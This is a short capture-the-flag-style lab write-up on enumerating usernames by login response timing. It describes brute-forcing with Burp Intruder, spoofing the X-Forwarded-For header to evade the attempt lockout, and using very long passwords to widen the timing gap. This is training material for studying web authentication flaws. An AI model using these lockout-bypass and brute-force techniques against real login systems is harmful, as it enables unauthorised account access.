Username enumeration via response timing
Username enumeration via response timing
Task
This lab is vulnerable to username enumeration using its response times. To solve the lab, enumerate a valid username, brute-force this user’s password, then access their account page.
Your credentials: wiener:peter
Candidate usernames
Candidate passwords
Attempt
Use Intruder against the login form to enumerate the correct username. But after the 2nd payload, I got too many incorrect login attempts
error. Add the X-Forwarded-For
header and using Pitchfork, spoof your IP address.
Since this website doesn’t give you any overt error message indicating only your password is incorrect, you need to set a super strong password so that the server needs to take a long time to process.
![[Pasted image 20250520225849.png]]
You can generate a pseudo-random string like this and copy it to the clipboard:
< /dev/urandom tr -dc 'a-zA-Z0-9' | head -c128 | xclip -selection clipboard
After identifying the correct username, go brute-force the password and log in to the website!
Thoughts
Though I just blasted intruder and performed a brute-force attack, this is not realistic because in real environments you don’t know what kind of vulnerability they have and also an attempt of brute-forcing is often prohibited by rules. And you know that 128-letter password is too long for most websites.